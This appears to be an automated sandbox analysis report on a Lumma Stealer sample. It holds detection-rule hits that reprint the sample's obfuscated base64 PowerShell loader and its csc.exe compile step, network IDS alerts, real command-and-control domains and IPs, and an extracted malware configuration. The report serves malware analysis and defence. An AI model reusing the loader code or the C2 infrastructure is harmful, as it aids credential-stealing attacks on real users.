[Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9QKjN9WX9Me5F7H5KadGdt2B9qDx6zhgRnqqA4bBo5Xs = [Convert]::

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYY

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7036, TargetFilename: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9QKjN9WX9Me5F7H5KadGdt2B9qDx6zhgRnqqA4bBo5Xs = [Convert]::

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYY

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:08.098499+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.83.105	443	TCP
2024-09-26T21:06:09.339616+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.4.136	443	TCP
2024-09-26T21:06:10.307758+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49733	188.114.96.3	443	TCP
2024-09-26T21:06:11.270099+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49734	188.114.96.3	443	TCP
2024-09-26T21:06:12.236719+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49735	188.114.97.3	443	TCP
2024-09-26T21:06:13.185311+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49736	172.67.162.108	443	TCP
2024-09-26T21:06:14.187446+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49737	188.114.97.3	443	TCP
2024-09-26T21:06:15.341317+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49738	188.114.96.3	443	TCP
2024-09-26T21:06:16.341299+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49739	172.67.208.139	443	TCP
2024-09-26T21:06:18.843057+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49741	104.21.2.13	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:08.098499+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49731	104.21.83.105	443	TCP
2024-09-26T21:06:09.339616+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49732	104.21.4.136	443	TCP
2024-09-26T21:06:10.307758+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49733	188.114.96.3	443	TCP
2024-09-26T21:06:11.270099+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49734	188.114.96.3	443	TCP
2024-09-26T21:06:12.236719+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49735	188.114.97.3	443	TCP
2024-09-26T21:06:13.185311+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49736	172.67.162.108	443	TCP
2024-09-26T21:06:14.187446+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49737	188.114.97.3	443	TCP
2024-09-26T21:06:15.341317+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49738	188.114.96.3	443	TCP
2024-09-26T21:06:16.341299+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49739	172.67.208.139	443	TCP
2024-09-26T21:06:18.843057+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49741	104.21.2.13	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:12.715639+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	172.67.162.108	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:13.686133+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:09.839286+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:08.617671+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.4.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:10.796038+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:15.870582+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	172.67.208.139	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:14.675696+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:11.757427+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:12.238203+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.4	57422	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:13.186601+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.4	64256	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:09.346176+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.4	64591	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:08.104172+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.4	57092	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:10.311075+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.4	60410	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:15.342996+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.4	52826	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:14.188975+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.4	50375	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:06:11.273157+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.4	54684	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: reinforcenh.shop	Avira URL Cloud: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: https://gutterydhowi.shop/api	Avira URL Cloud: Label: malware
Source: https://drawzhotdog.shop/api	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/apiB	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: ghostreedmnu.shop	Avira URL Cloud: Label: malware
Source: https://ballotnwu.site/api	Avira URL Cloud: Label: malware
Source: https://ptramidermsnqj.shop/api	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/	Avira URL Cloud: Label: malware
Source: ptramidermsnqj.shop	Avira URL Cloud: Label: malware
Source: https://vozmeatillu.shop/api	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/api	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/api	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: https://fragnantbui.shop/api	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/api	Avira URL Cloud: Label: malware
Source: gutterydhowi.shop	Avira URL Cloud: Label: malware
Source: drawzhotdog.shop	Avira URL Cloud: Label: malware
Source: https://ptramidermsnqj.shop/llh	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: vozmeatillu.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Found malware configuration

Source: 5.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["ptramidermsnqj.shop", "reinforcenh.shop", "gutterydhowi.shop", "stogeneratmns.shop", "vozmeatillu.shop", "offensivedzvju.shop", "fragnantbui.shop", "ghostreedmnu.shop", "drawzhotdog.shop"], "Build id": "LPnhqo--zdexodnebqjx"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ptramidermsnqj.shop
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000005.00000002.1851085077.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--zdexodnebqjx

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.83.105:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49732 version: TLS 1.2
